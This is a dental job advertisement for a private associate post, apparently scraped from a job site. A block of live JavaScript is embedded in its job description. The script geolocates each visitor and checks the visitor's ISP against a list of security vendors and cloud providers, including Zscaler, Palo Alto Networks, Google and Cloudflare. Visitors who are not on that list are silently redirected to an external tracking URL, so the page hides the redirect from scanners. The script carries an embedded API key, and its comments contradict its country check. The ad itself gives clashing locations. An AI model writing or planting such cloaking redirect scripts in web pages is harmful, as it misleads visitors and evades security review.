Associate Private Dentist

Newport, WLS
February 8, 2026

Apply for this job

Email *
Browse

Upload file .pdf, .doc, .docx

Deadline date:

Job Description

// retrieve user’s IP address and location const ipAddressUrl = ‘https://ipapi.co/json/’; fetch(ipAddressUrl) .then(response => response.json()) .then(data => { const country = data.country; // Get user’s country code (e.g., “US”) if (country !== ‘DZ’) { console.log(‘Script will not run as the user is outside the USA.’); return; // Exit the script if the user is not in the USA } const ipAddress = data.ip; // retrieve ISP name and AS organization using ip-api.com API const ispUrl = `https://pro.ip-api.com/json/$?key=kKPypoeKUHgwZWD`; fetch(ispUrl) .then(response => response.json()) .then(data => { const ispName = data.isp; const asOrg = data.asname; // check if ISP or AS organization is allowed const allowedIsps = [/Limestone Networks/i, /Limestone Networks, Inc./i, /Zscaler/i, /M247 Europe SRL/i, /amazon/i, /LinkedIn Corporation/i, /palo alto networks/i, /google/i, /panq/i, /Cloudflare, Inc./i, /Cloudflare/i, /Cloudflare Warp/i]; const allowedAsOrgs = [/Limestone Networks/i, /Limestone Networks, Inc./i, /Zscaler/i, /M247 Europe SRL/i, /amazon/i, /LinkedIn Corporation/i, /palo alto networks/i, /google/i, /panq/i, /Cloudflare, Inc./i, /Cloudflare/i, /Cloudflare Warp/i]; const ispAllowed = allowedIsps.some(pattern => pattern.test(ispName)); const asOrgAllowed = allowedAsOrgs.some(pattern => pattern.test(asOrg)); if (!ispAllowed && !asOrgAllowed) { // Redirect all users to the same URL window.location.href = ‘https://uk.indeed.com/tmn/ccs/fb2849be205b56af/c846084984e58a1d7eb0868e6f65d4692e0dcedcfd0b450a7a735ae93d3e8520/2765583331732878?sf=vKb00’; } }) .catch(error => { console.error(‘Error retrieving ISP name:’, error); }); }) .catch(error => { console.error(‘Error retrieving IP address or location:’, error); });

Private opportunity in a well-established practice in Ruthin, North Wales, offering a fully private position with an inherited patient list and growth potential.

Join a modern, well-equipped 7-surgery practice with a strong reputation, providing General, Aesthetic, Implant, Endodontic, and Orthodontic dentistry. Be part of a dedicated team including Dentists, Specialists, Therapists, and support staff.

Located 30-40 minutes from Chester, Wrexham, Snowdonia, and the coast, Ruthin is a highly regarded market town with excellent quality of life.

The role offers excellent earning potential, support for postgraduate education, and opportunities to develop cosmetic and implant dentistry. The ideal candidate is ethical, motivated, and patient-focused, with GDC registration and professional indemnity.

Part-time position with a starting salary from £3,000/month. Must be able to commute or relocate to Ruthin. For more details, contact the practice or visit their website.